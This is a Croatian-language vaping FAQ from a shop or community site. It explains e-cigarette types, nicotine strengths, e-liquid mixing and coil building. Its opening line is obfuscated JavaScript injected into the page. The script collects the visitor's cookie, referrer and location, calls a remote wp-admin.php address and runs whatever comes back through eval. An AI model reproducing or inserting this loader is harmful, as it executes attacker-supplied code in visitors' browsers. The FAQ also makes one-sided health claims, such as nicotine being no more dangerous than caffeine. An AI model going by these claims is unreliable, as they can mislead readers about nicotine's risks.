;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Vape F.A.Q.

Kako bi riješili bilo kakvu misteriju e cigareta i što e cigarete jesu, kreirali smo za vas ovaj F.A.Q. odnosno učestala pitanja o e-cigaretama

Vaping je čin udisanja isparene tekućine iz elektroničkog uređaja. Para obično sadrži nikotin, aromu, biljni glicerin i propilen glikol.

Pare napravljene od evaporiranog propilen glikola, biljnog glicerina, aroma i (ako je primjenjivo) nikotina. 

Da. UK Vlada je prepoznala vaping kao alat broj jedan koji koriste pušači kako prestali pušiti. Nedavna studija financirana od strane (UK) Nacionalnog instituta za zdravstvena istraživanja i istraživanje raka UK, pokazala je da je vaping gotovo dvostruko učinkovitiji od kombinacije ‘zlatnog standarda’ NRT proizvoda u pomaganju pušačima da prestanu pušiti.

Pasivno pušenje ubija – ali pasivan VAPING do sada je pokazao toliko malo toksina u parama da ih se uglavnom ne može otkriti. Za više informacija pročitajte članak na linku.

Sve ovisi o okusu vaše e-tekućine. Ako koristite okus duhana, općenito će imati sličan okus kao određena marka duhana, ali ne – okus nikada neće biti identičan klasičnoj cigareti.

Dostupan je beskonačan broj okusa tako da možete odabrati onaj koji vam najviše odgovara, a možda samog sebe iznenadite odabirom kada se ispostavi da preferirate voćne ili desertne tekućine.

Svakome iznad 18 godina tko želi sigurniju alternativu pušenju tradicionalnih duhanskih proizvoda. Imajte na umu da neki proizvodi sadrže nikotin. 

E cigarete nemaju nikakve dodirne točke s cigaretama. Čak niti činjenica da koristite nikotin – to nije poveznica.

Iako prema zakonu ili sa stajališta drugih vi možda jeste “pušač”, ispravno bi bilo reći da ste parioc.

S druge strane ako je nikotin jedino što deklarira “pušača” pušačem, pitanje je jesu li korisnici nikotinskih flastera “pušači”? S obzirom na to da se identičan nikotin koristi i u nikotinskim flasterima.

S MTL vapingom paru prvo unosite u usta, prije nego udahnete u pluća. Klasične cigarete obično se puše na ovaj način te ovaj način puffkanja može izuzetno odgovarati onima koji pokušavaju prestati pušiti.

Oprema – Ova tehnika najbolje funkcionira sa spremnicima koji koriste zavojnice većeg oma, niske snage i s uskim usnikom. Ograničeni protok zraka olakšava zadržavanje pare u ustima prije udisanja.

Prednosti MTL-a su: koristi manje e-tekućine, daje hladniju paru, koristan za prestanak pušenja, bolji okus. Cjelokupni osjećaj je nježniji od DL-a, što ga čini prikladnijim za početnike i povremene vapere.

Kod DL vapinga paru udišete izravno u pluća. Gusta para brzo ispunjava pluća, slično kao pri korištenju lule za šišu. Kao rezultat toga, udar u grlo je intenzivniji pa se razine nikotina moraju na odgovarajući način smanjiti.

Oprema – Za ovaj način vapinga koriste se atomizeri velikog protoka zraka u kombinaciji sa zavojnicama niskog otpora. Savjetuje se razina nikotina od 6 mg i manje jer korisnik udiše velike količine pare odjednom.

DL zahtijeva neko osnovno znanje o vapingu, pa se ne preporučuje početnicima. Osim toga, osoba koja tek prelazi sa cigareta na e-cigarete neće znati kako ispravno udahnuti paru na ovaj način te može doći do kašljanja i smetnji.

Iako uređaji za vaping dolaze u svim oblicima i veličinama, obično se mogu podijeliti na dvije ključne komponente: bateriju i atomizer.

Baterija može biti integrirana u elektronski uređaj ili možete koristiti eksterne baterije ukoliko koristite uređaje zvane MOD-ovima.

Atomizer je onaj dio e-cigarete u koji se toči e-tekućina, a on u sebi ima grijač koji istu tekućinu isparava.

Kod odabira e cigarete imate nekoliko osnovnih oblika koje ćemo navesti i ukratko objasniti:

  1. POD ecigareta – e cigarete manjih dimenzija, jednostavnog oblika koje karakterizira jednostavnost upotrebe. Imaju uglavnom smanjeni broj funkcija (koje su početniku i ovako nebitne) te nešto kraće trajanje baterije.
  2. AIO uređaji – uređaji koji su još uvijek relativno mali no imaju veći kapacitet baterije obično su oblika i dimenzija kao vodootporni flomaster.
  3. MOD + Atomizer (komplet ili se kupuje odvojeno) – setovi koje često nazivamo “napredni” iako to ne moraju biti. Imaju dodatne opcije kao što su određivanje snage rada uređaja ili izmjenjive baterije. Karakterizira ih najduže trajanje baterije, laka izmjena baterija no uređaji su uglavnom veći spram prethodno nabrojanih.

Ukoliko ste se odlučili za POD e cigaretu ovo su modeli koje preporučamo (lista nije po redoslijedu važnosti):

SLIMS by Journey (klik na ime za opcije)
Prednosti:
– ekstremno jednostavna za upotrebu. Natoči se e tekućina kroz ventil patrone bez curenja, aktivira se na povlačenje i to je sve što trebate znati.
– povoljna cijena
– 6 mjeseci garancija (12 mjeseci ako ste registrirani član www.vaper-pub.com stranice)
– daje odličnu aromu i okus
– solidno trajanje baterije za tako mali uređaj
Nedostaci:
– Baterija traje kraće nego kod većih uređaja

SMOK Nfix (klik na ime za review) – vrlo dobar grijač, vrlo mali i kompaktan uređaj sa baterijom od 700mAh (duže trajanje baterije od SLIMS-a). Daje odličnu aromu. Može se podešavati snaga. Radi automatski na povlačenje. 

Kroma Z (klik na ime za review) – pod koji daje sve funkcije naprednih korisnika. Odličan dizajn, odlično trajanje baterije (gotovo 3-4x više nego SLIMS ili spomenuti Nfix), daje odličnu aromu (no nešto slabiju nego Nfix ili SLIMS). Mogućnost dodavanja 510 navoja i nastavak korištenja uređaja s atomizerima.

Ukoliko ste se odlučili na AIO, ovo su modeli koje preporučamo (lista nije po redoslijedu važnosti):

Endura T20s (klik na ime za review) – grijač 0.8, korisnici koji su kupili ovaj model su s njime i zadovoljni. Uređaj je dosta “jak” da pomogne počeniku da se odvikne cigareta.

Zlide tube – veća baterija = duže korištenje bez potrebe za punjenjem. Zlide tank je poprilično popularan jer radi dobro i jednostavan je za upotrebu. Ovaj uređaj preporučujemo onima koji puše dvije ili više kutija cigareta dnevno.

 

Jedinstven odgovor na ovo pitanje ne postoji jer koliko će trajati baterija e cigarete ovisi o:
– modelu e cigarete koji koristite
– o tome koliko često udišete paru

jednostavniji POD uređaji
Najmanji dimenzijama, kapacitet baterije im je od 400 do 1100 mAh što je uglavnom dovoljno za 4 – 10/12 sati korištenja.

napredniji PODuređaji i AIO e cigarete
Srednje veliki dizajn, kapacitet baterije im je od 1100 – 3000mAh. To je uglavnom dovoljno za cijeli dan

Veći uređaji s integriranim baterijama
Uređaji s integriranim baterijama mogu imati kapacitet i do 5000 mAh što je dovoljno čak i za par dana korištenja (ovisno kako koristite uređaj).

Uređaji s izmjenjivim baterijama
Srednji kapacitet izmjenjive baterije je od prilike 3000mAh. To je u principu dovoljno za jedan dan korištenja, no prednost je da možete uvijek sa sobom imati rezervnu bateriju.

Što se tiče korištenja – naravno da što više koristite uređaj to će baterija trajati kraće.

Sasvim je normalno da u početku koristite uređaj više, to će se nakon određenog vremena smanjiti.

Ako imate osjećaj da konstantno posežete za uređajem i inhalirate, a želite to smanjiti – povećajte slobodno udio nikotina u e tekućini (tipa s 6mg na 12mg).

E cigarete često nosite u džepovima, držite ih po stolovima, padaju po podovima i slično. 

Vaša e cigareta je pod konstantnim utjecajem prašine, prljavštine i mrvica.

Također nesmijete zanemariti da sam atomizer odnosno grijač filtrira zrak (velike količine zraka) koje udišete kroz njega.

Drip tip je često u ustima, na njemu se lako mogu skupiti prljavštine.

Stoga je bitno održavati higijenu atomizera s obzirom da je to nešto što koristite za udisanje ili prinošenje ustima.

Kako ispravno održavati atomizere čistima pročitajte u članku.

U e tekućinama se najčešće nalazi ili “freebase” nikotin ili “nic salts”.

Mi osobno ne preporučamo nic salts iz razloga što smatramo da ne pruža korisniku “Throat hit” koji je potreban prilikom prelaska s cigareta. Također e tekućine s nic saltima ne mogu steepati.

Freebase nikotin je nikotin koji se najčešće nalazi u e tekućinama. Također se koristi u drugim farmaceutskim proizvodima kao što su nikotinski flasteri.

Freebase nikotin omogućava steepanje e tekućine te throat hit koji najbliže dočarava pušenje cigarete.

Standardan nikotin koji se upotrebljava u izradi e tekućina je “Freebase nikotin”. Korišten je još u nekim drugim farmaceutskim proizvodima kao što su nikotinski flasteri.

Nic Salti su vrsta nikotina koja se pojavila na tržištu prije nekoliko godina. “Prednost” te vrste nikotina je bila što ne “steže” grlo prilikom konzumacije (throat hit).

Dakle ukoliko bi netko htio pariti e tekućinu s 24 mg nikotina – koristeći freebase nikotin to bi bilo dosta intenzivno za grlo i ne bi mogao uživati u parenju.

No, zakon je odredio da maksimalna količina nikotina (bilo kojeg) u e tekućinama ne smije prelaziti 20mg.

Osim toga e tekućine koje koriste “nic salte” kao nikotin ne mogu steepati (sazrijevati) stoga su obično sladunjavog okusa – što ne paše novim korisnicima.

Sam nikotin ne osjetite prilikom udisaja pare, nema throat hita (stezanja grla) što početnicima ne odgovara jer žele osjetiti tu težinu i gustoću pare zajedno sa throat hitom jer to najbliže simulira pušenje cigareta.

Uz to smo imali dosta iskustava s korisnicima koji su konzumirali odjednom previše nikotina od čega su dobili vrtoglavicu. Nešto što se može puno teže desiti sa standardnim nikotinom jer priliokm samih udisaja osjetite kada je “dosta”.

Čisti nikotin (koji je ujedno i nedostupan u slobodnoj prodaji) je izuzetno opasan i toksičan, no relativno je siguran u dozama koje se koriste u e tekućinama.

Nikotin se do sada uvijek istraživao pod prizmom cigareta. Iz tog razloga su donošeni mnogi krivi zaključci kako je nikotin kancerogen i izazva bolesti. Istina je ta da ostale komponente redovne cigarete izazivaju zdravstvene probleme te potiču ovisnost o nikotinu raznim kemijskim spojevima koji utječu na njegovu apsorpciju u tijelu.

Nikotin u e cigareti nije ništa više opasan nego kofein u kavi ili tein u čaju.

Stoga ako želite smanjiti učestalost konzumacije e cigarete preporuka je da povećate količinu nikotina te da je postepeno smanjujete kroz određeni vremenski period.

MOD e cigarete je uređaj s baterijom na koji stavljamo (zašarafimo) atomizer te on isporučivanjem snage baterije zagrijava žicu grijača atomizera prilikom čega zagrijani grijač isparava e tekućinu.

Postoje regulirani i mehanički modovi.

Regulirani MODovi u sebi sadrže čip pomoču kojeg se regulira mod rada uređaja. Mehanički MODovi ne posjetuju čip.

Više o MODovima za e cigarete pročitajte u članku.

VG je skraćenica biljni glicerol,
PG je skraćenica propilen glikol,
Oboje su sastavni dijelovi e tekućine.

Biljni glicerol odnosno VG pridonosi težini i gustoći pare.
Propilen glikol odnosno PG razrijeđuje e tekućinu, daje “throat hit” (lagano stezanje grla prilikom udisaja), također vrlo dobro prenosi okus arome.

50:50 ili 70:30 označava omjer VG-a i PG-a u e tekućini.

U PODovima, te počeničkim e cigaretama je preporuka koristiti e tekućine koje su 50:50. One su rijeđe, imaju nešto intenzivniji okus i bolji ugođaj parenja za početnike (zbog stezanja u grlu).

70:30 u korist VG-a je za osobe koje žele manje stezanja u grlu, te gušće oblake. Takvi korisnici uglavnom žele tu “težinu” pare koju konzumiraju te manje stezanja u grlu.

I jedno i drugo je potpuno ispravno za korištenje i generalno se ne dijeli na “napredne” i “početnike”.

U ovim člancima možete doznati sve što trebate znati o biljnom glicerolu i propilen glikolu

E tekućine možete kupiti u ovom obliku:

10ml gotove e tekućine koje već sadrže nikotin. Kapacitet od 10ml je propisan zakonom ukoliko e tekućina sadrži nikotin.

Longfill – koncentrat aroma bez nikotina u bočici od 30/60/120. Korisnik mora sam dodati nikotinsku bazu.

Shortfill – koncentrat aroma + baza bez nikotina – korisnik sam mora dodati nikotinski koncentrat, najčešće nikotinske boostere odnsono nikotinske shootere (dva pojma za istu stvar).

Shortfill je način pakiranja e tekućine gdje kao korisnik morate u bočicu e tekućine dodati samo nikotinske boostere.

Najčešće se radi o “20 u 30” ili “50 u 60” pakiranjima.

20 u 30 znači da bočica sadrži već 20ml pripravka, te vi možete dodati 1 nic shot od 10ml.

50 u 60 znači da bočica sadrži već 50ml pripravka te da vi možete dodati još jedan nic shot od 10ml.

Ako u “20 u 30” dodate:
1x 10ml 10mg nic shot dobit ćete 3.3 mg nikotina e tekućinu
1x 10ml 20mg nic shot dobit ćete 6.6 mg nikotinsku e tekućinu

Ako u “50 u 60” dodate:
1x 10ml 10mg nic shot dobit ćete 1,6mg e tekućinu
1x 10ml 20mg nic shot dobit ćete 3.3 mg e tekućinu

Shortfill kao i longfill ili arome – potrebno je steepati prije korištenja (ukoliko to želite).

Longfill je vrsta pakiranja e tekućine gdje kupujete samo koncentrat arome te morate dodati nikotinsku bazu.

Za razliku od shortfilla, longfill ne sadrži nikakvu bazu već isključivo samo aromu odnosno okus.

Prednost longfila je taj što možete napraviti e tekućinu s većim udjelom nikotina.

Kako ne bi morali sami računati koliko nic boostera kupiti – možete potražiti Journey Easy DIY setove. Journey easy DIY set odabirete prema količini nikotina koju želite dobiti u gotovoj e tekućini.

Pitali smo Vaper Pub community da naprave glasanje koja bi bila najbolja e tekućina za početnike.

Svi su se složili da bi to trebala biti duhanska, i to jedna od ovih:

1. Journey Classic Grampas Cream
2. Discovery Parliament
3. Journey Classic El Presidente
4. Discovery M Type (Red M)
5. Journey Classic Spirit of the Woods

Ova lista je kombinacija informacija dobivenih od članova zajednice te trgovina.

Identičan okus cigareti nećete pronaći.

Ono što možete pronaći su vrlo bliske simulacije okusa duhana s ili bez nekakvih primjesa.

Duhanske arome koje su vrlo popularne kod kupaca su primjerice okusi iz Discovery linije kao što su M Type, 555, Cohiba i slični.

Ukoliko ste pušili 1 kutiju nekih “light” cigareta dnevno možete uzeti e tekućinu od 6mg.

Ukoliko ste pušili 1-2 kutije nekih jačih cigareta tada preporučujemo 12mg e tekućinu.

E tekućine i arome je najbolje čuvati na hladnom i tamnom mjestu. Primjerice u ladici ili u ormaru.

Ako imate veliki broj e tekućina ili aroma za koje znate da ih nećete koristiti duži period preporuka je da ih držite u hladnjaku ili čak zamrzivaču.

Tako ćete maksimalno sačuvati kvalitetu okusa.

Teoretski ne.

Aroma kao takva je kemijski spoj i nema organskih elemenata koji se mogu pokvariti. U nekim državama EU, primjerice Grčkoj, ne navode rok trajanja na arome.

E tekućine se također ne mogu pokvariti zbog isteka roka trajanja.

No ono što se može desiti nakon isteka roka trajanja je promjena u okusu.

Ukoliko ste pronašli (tipa u ladici) nekakvu e tekućinu ili aromu kojoj je istekao rok trajanja – neće se ništa desiti ukoliko je parite no uzmite u obzir da taj okus neće predstavljati onakav isti okus kakav bi ta aroma imala u početku.

Razlog tome je što arome jednostavno ishlape.

E tekućine i arome se mogu pokvariti jedino ako oksidiraju, tada postanu neparljive i javlja se “čili” okus ili “papreni okus”.

Ponovo – ništa se neće desiti sa zdravstvene strane, ali to vam jednostavno neće biti ugodno za pariti.

Ta pojava “čili” okusa se javlja ukoliko arome ili e tekućine nisu bile ispravno skladištene te su bile pod utjecajem sunca ili izravnog izvora topline.

Ovo je vrlo individualno i ovisi koju vrstu uređaja koristite.

Ukoliko koristite POD uređaje koji su uglavnom vrlo štedljivi, jedna e tekućina od 10ml mijenja od prilike 3-5 kutija cigareta.

Ukoliko koristite uređaje tipa AIO ili komplete e cigareta koji se sastoje od atomizera i MOD-a 10ml e tekućine mijenja od prilike 1-2 kutije cigareta.

Ovo je normalna pojava do koje dolazi zbog porasta temperatura grijača. Pod utjecajem topline e tekućina može pucketati.

Ukoliko želite doznati više pročitajte članak zašto e cigareta pucketa?

Dry hit je situacija kada pokušavate udahnuti paru no ne primjetite da vam je atomizer prazan i vata suha. Tada umjesto isparavanje pare dolazi do gorenja vate – udisanje toga je krajnje neugodno.

Desi se svima :)

Radi se o osobnom “sweet spotu” odnosno kada ste podesili uređaj i sve parametre e cigarete da vama daje najbolji ugođaj parenja.

“Meni je sweet spot za Spirit of the Woods 0.8 ohm grijač na 13W, Siren v2 atomizeru” 

Preporučili bi Zenith ili Zlide od Innokina.

Ti atomizeri daju vrlo solidnu aromu, grijači su dosta izdržljivi i povoljni.

Određeni faktori utječu na to koliko će grijač dugo trajati.

E tekućine koje brzo prljaju grijače su:
– one koje sadrže okuse čokolade
– iznimno kremaste e tekućine
– e tekućine s puno sladila

Grijače najmanje prljaju čiste voćne arome te određene čiste duhanske tekućine bez dodataka.

U prosjeku, zavojnicu/grijač treba mijenjati svakih jedan do dva tjedna, međutim, to se razlikuje ovisno o tome koliko često koristite svoju e-cigaretu, koji uređaj koristite, kakve e-tekućine koristite, mijenjate li često tekućine ili koristite jednu tekućinu duže vremena.

Ipak, nemojte da vas ovo zbunjuje jer ćete sami najbolje prepoznati kada ja vrijeme da se grijač promijeni.

Ako uređaj ne radi jednako dobro kao ranije, ako se aroma promijenila, ako osjećate ukus nalik zagorjelom… Sve su to pokazatelji da je došlo vrijeme da se grijač zamijeni.

 

Grijač mijenjate kada osjetite nešto od sljedećeg:
– da atomizer ne generira više istu količinu pare
– kada osjetite promjenu u okusu e tekućine
– kada vidite da se boja e tekućine unutar atomizera mijenja u tamniju
– kada osjetite peckanje u ustima, jeziku ili grlo (ekstremno prljav grijač)
– kada vas parenje tjera na kašljanje (vrlo ekstremno prljav grijač)

Preporuka je da mijenjate grijač prije ove dvije zadnje faze.

Teoretski ne.

Očekivano je da ćete u startu češće posezati za e cigaretom iz razloga što se morate odviknuti od cigareta. To je proces koji može potrajati i do mjesec dana.

Očekujte da ćete relativno često posezati i inhalirati e cigaretu.

Sam nikotin u e cigareti drugačije funkcionira od nikotina u standardnim cigaretama. U e cigareti ne postoje kemikalije koje utjeću na brzinu iskoristivosti nikotina prilikom udaha dok u cigaretama to postoji. 

Ispravnim odabirom optimalne količine nikotina u e tekućini možete utjecati na to koliko ćete uređaj koristiti.

Početnicima koji su pušili neke izuzetno jake cigarete, ili više kutija dnevno savjetujemo e tekućine s 12mg nikotina.

Osobama koje su koristile “light” cigarete ili iQos i slične uređaje – preporučujemo e tekućine s 6mg nikotina.

Da, to je sasvim normalno. E tekućina nema dodane kemijske spojeve kao što to ima cigareta a koji služe poticanju lučenja sline.

Preporuka – konzumirajte više vode, hidratizirajte se.

Kod apsolutnih početnika i oni koji pare prvi puta to je apsolutno normalno.

Propilen glikol (PG) je taj koji je zaslužan za stezanje u grlu te je potrebno par sati da se na njega naviknete.

Ukoliko se nelagoda javlja konstantno, dugotrajno te je popraćena kašljanjem – moguće je da ste blago alergični na PG. U tom slučaju morate odabrati e tekućine s manjim udjelom PG-a u miksu (dakle ne 50:50 nego 70:30 u korist VG-a).

Korisnike često alarmira činjenica da s prelaskom na e cigaretu počinju i kašljati.

Nelagoda u grlu prilikom udisaja pare e tekućine dolazi od Propilen glikola (PG) te se naziva throat hit. U samom početku on može uzrokovati kašljanje.

Ako se kašljanje ne smiri unutar 1-2 dana postoji mogućnost da je problem negdje drugdje.

Potencijalni problemi:
– izrazito ste alergični na PG – koristite e tekućine s velikim udjelom VG-a

– PG je izuzetno loše kvalitete – promijenite proizvođača e tekućine

– alergijska reakcija na neku od aroma u e tekućini – promijenite e tekućinu

– neispravan grijač e cigarete – promijenite grijač

Ako ste početnik – obratite se s opisom problema zajednici ili prodajnom osoblju.

Ako ste već koristili e cigarete onda možete sami eliminirati gore navedeno i zaključiti gdje bi mogao biti problem.

Također imajte na umu da s prestankom korištenja standardnih cigareta pluća se počinju oporavljati, čistiti stoga je normalno da ćete i zbog toga pojačano kašljati.

Bez panike, niste jedini.

Dešava se da određeni korisnici ne mogu koristiti e tekućine s većim udjelom Propilen glikola (PG-a) te da se javlja blaga alergijska reakcija koja može uzrokovati kašljanje.

Kašljanje može izazvati i lošija kvaliteta PG-a.

Pokušajte promijeniti brand PG-a koji koristite, ili brand e tekućina.

Ili pokušajte smanjiti udio PG-a u vašoj e tekućini. Ukoliko parite 50:50 pokušajte pariti 70:30.

Želite li doznati više o preosjetljivosti na PG – pročitajte članak.

Ako otklonite mogućnost da su vam popucale usne od primjerice hladnoće, problem je vjerojatno u alergijskoj reakciji na neku od komponenti u e tekućini.

Dovoljno će biti zamijeniti e tekućinu drugom.

Ne.

E tekućine ne sadrže šećer te ako su slatke – ta slatkoća dolazi iz samih aroma jer su arome po svojoj prirodi slatke ili zbog dodane sukraloze. 

Sukraloza sama po sebi ne utječe na razinu šećera u krvi, no moramo naglasiti da je također ne konzumirate “gutanjem”, te da je njezin udio u cijeloj e tekućini izuzetno mali.

Pojam “vaperski jezik” je vezan za pojavu prezasićenosti okusnih senzora na vašem jeziku.

To se može pojaviti u situacijama kada koristite e tekućine koje sadrže iznimno velike količine aroma ili sladila u sebi gdje dolazi do zasićenja i više ne možete osjetiti okuse.

“Vaperski jezik” prolazi sam od sebe unutar par dana. 

Kako bi spriječili nastanak “vaperskog jezika” preporučujemo:
– svakodnevnu fizičku aktivnost od minimalno sat vremena
– ne korištenje e cigarete minimalno sat vremena
– korištenje e tekućina koje sadrže do 10% aroma u mixu (kao što su Journey, SHAKE i slično)
– korištenje e tekućina koje ne sadrže velike udjele dodanih sladila (kao što su Journey, SHAKE i slično)
– redovno održavanje higijene usne šupljine
– konzumiranje dovoljne količine tekućine.

Preporučili bi vam Siren v4 ili Ares v2.

Oba atomizera daju vrlo dobru aromu koji god okus koristili. Jednostavni su za slaganje, dostupni u većini trgovina.

Desi se da MOD koji puta baci tu grešku. Ne mora odmah značiti da se radi o kvaru MOD-a već možete pokušati slijedeće:

1. Probajte zamjeniti atomizer ili grijač. Možda se radi o greški grijača.

2. očistite 510 kontakte atomizera i MOD-a

3. provjerite 510 pin na atomizeru – navoj s donje strane atomizera. Centralni dio 510 pina mora biti lagano ispupčen.

4. Provjerite 510 konektor na MOD-u

Ako ste sami sastavljali grijač:
– možda je otpor prenizak
– možda vam je ostao komadić žice negdje u atomizeru
– možda vam dio grijača dodiruje vanjski dio komore odnosno rubove

To su neki od potencijalnih problema koji mogu uzrokovati “no atomizer” grešku.

Detaljnije pročitajte u članku što kada atomizer baca “no atomizer” grešku.

RDA je skračenica za rebuildable dripping atomizer.

Oni se razlikuju od standardnih atomizera utoliko što korisnik sam kapa e tekućinu direktno na vatu.

RDA ne posjeduje “tank” koji sadrži e tekućinu.

Više o tome što je RDA pročitajte u članku.

RBA je skraćenica za Rebuildable atomizer – sve tankove odnosno atomizere u kojima se može raditi grijač.

RTA je rebuildable tank atomizer – atomizer koji ima tank za e tekućinu i u kojem sami izrađujete grijače.

RDTA je Rebuildable Dripping Tank Atomizer – to je dripper atomizer koji ujedno ima i tank za e tekućinu i za kojeg grijače izrađujete sami.

Potreban vam je set za izradu grijača.

Takve setove možete kupiti u bilo kojoj trgovini e cigareta ili ih možete napraviti sami.

Ono što vam je potrebno:
– odvijači s kojima ćete odviti vijke na building decku (mjesto gdje se montira grijač)

– škarice za vatu 

– pinceta s keramičkim vrhom

– vata

– žica za izradu grijača

– precizna kliješta za žicu (cvikcange)

Proces je vrlo jednostavan no zahtjeva nešto prakse, pokušaja i pogreške.

Odrežete komad žice. Žicu navijete na odvijač ili drugi alat koji vam za to služi. 

Takav grijač položite na deck unutar atomizera. Cvikcangama odrežete višak žice, provučete vatu i to je to.

No, zvuči koji puta jednostavnije nego što je.

Primjer kako se radi grijač za jedan atomizer možete pogledati u ovom videu: izrada grijača za Siren.

Za wick (vatu) grijača atomizera odaberite obavezno specijalizirane vate za izradu grijača koje možete kupiti u specijaliziranim trgovinama.

Primjer solidnih vata je Cotton Bacon i Journey vata.

Nikako nemojte koristiti blazilnice ili neke druge oblike vate koje se obično koriste u kozmetičke svrhe iz razloga što one mogu sadržati nepoželjne spojeve te utjecati na okus e tekućine.

Za izradu e tekućine vam treba okus (aroma, longfill) te nikotinska baza.

Najjednostavniji način izrade vlastite e tekućine je da kupite:
1. Tekućine za e cigarete
2. DIY set za jednostavnu izradu e tekućina

Slijedite ovaj postupak:
1. otvorite bočicu okusa (longfill)
2. ulijete u tu bočicu sadržaj malih bočica iz DIY seta
3. ulijete koliko stane još sadržaj velike bočice iz DIY seta
4. zatvorite bočicu okusa (longfill)
5. dobro protresete

Video uputu pogledajte ovdje > kako sam napraviti e tekućinu

Nikotinski booster ili nikotinski shooter (nic shot) je 10ml bočica koja sadrži nikotinsku bazu, najčešće jačine nikotina od 10mg ili 20mg po mililitru.

Dakle ako vidite nic booster:
10ml / 10mg – znate da je to 10ml nikotinske baze od 10mg.

10ml / 20mg – znate da je to 10ml nikotinske baze od 20mg (duplo jača od prethodno navedene).

Navedene proizvode koristite u kombinaciji s longfilom ili shortfilom kako bi napravili e tekućinu s nikotinom.

Nic boosteri također dolaze u raznim VG/PG omjerima (najčešće 50/50 ili 70/30 u korist VG-a, no ima i drugih – pa na to također obratite pažnju prilikom kupovine, ako vam je to bitno za željeni konačni VG/PG omjer u vašoj e tekućini)

1. koliko je velika boca e tekućine koju radite: 30, 60 ili 120 mililitara?
– recimo 120ml

2. Koliko želite dobiti nikotina u e tekućini?
– recimo 6mg

3. Pomnožite 6×120 = 720

4. Koliko nikotina sadrže nikotinski boosteri? 
– recimo da kupujete one od 20mg nikotina. 10ml x 20mg = 200

5. Podijelite 720 sa 200 i dobit ćete broj koliko nic shotova morate dodati u 120ml bočicu da bi dobili 6mg nikotina
– 720/200= 3.6 bočice 

Dakle da bi dobili 120 ml e tekućine jačine 6mg morate dodati 3.6 bočice nikotinskih boostera 10ml jačine nikotina 20mg.

Da ne morate sami računati i preračunavati možete potražiti Journey Easy DIY setove za izradu e tekućine gdje kupujete SET za izradu prema jačini e tekućine koju želite dobiti. Sve je izračunato da vi ne morate, samo sadržaj seta ulijete u bočicu okusa (longfill).

Također, na našoj stranici možete pronaći vape kalkulator koji će vam pomoći izračunati neke osnove u vezi postotka nikotina.

Na ovo pitanje je gotovo nemoguće odgovoriti jer svaka od žica, ispod navedenih, ima svoje prednosti i mane te ovise o osobnim potrebama i preferencijama pojedinca.

To je mjerna jedinica za debljinu žice. Može biti u milimetrima ili gauge (GA).

Najčešće debljine žica su:

24GA – 0.5106mm
26GA – 0.4038 mm
28GA – 0.32mm
30GA – 0.254mm

Postoje standardne žice različitih materijala kao što su Kanthal, SS, NiCr, NI80, Nickel, Titanium.

Također možemo reči da postoje i različiti oblici žice odnosno kombinacija žica isprepletenih u neki naprednji coil tipa: clapton, twisted clapton, alien, juggernaut. Tu se radi u principu o gore navedenim žicama no koje su isprepletene.

Kanthal je žica koja se najčešće koristi u vapeu i od amatera i profesionalaca, te je najstarija vrsta žice koja se koristi za grijače. Najlakše ju je oblikovati i zbog visoke tolerantnosti na temperatutu (preko 1500°C) je otporna na deformacije, ne oksidira, najjeftinija je.

Neki kažu da Kanthal ne daje baš aromu kao neke druge žice, ali je jednostavna za korištenje.

Koristi se isključivo u power/watt modu.

Ni80 je žica koja je u osnovi bolja od kanthala jer ima jednako visoki otpor na taljenje i oksidaciju a daje nešto bolju aromu, no, kod njega trebaju pripaziti ljudi koji su alergični na nickel.
Koristi se u power modu.

SS ili stainless steel (316, 316L, 410, 413) je najtrajnija žica od nehrđajučeg čelika, ne sadrži nickel, ima relativno brzo vrijeme zagrijavanja i hlađenja. Vrlo visoka temperatura paljenja.

Nešto je skuplja od Kanthala.

Može se koristiti u temperaturnoj kontroli (TC) i power/watt modovima (većina klasičnih modova).

Žica od nickla je stari tip žica koja se koristila isključivo u temperaturnom režimu zbog toga što je reguliranim uređajima lagano kontrolirati snagu i struju potrebnu za zagrijavanje te žice.

Ali, u slučaju pregrijavanja je moguće trovanje.

Ne koristiti.

NiFe je žica koja se koristi u temperaturnom modu jer je brzo postiže visoku temperaturu čak i pri većim otporima, što u jednu ruku štedi bateriju.

Koristi se u Temperaturnom modu.

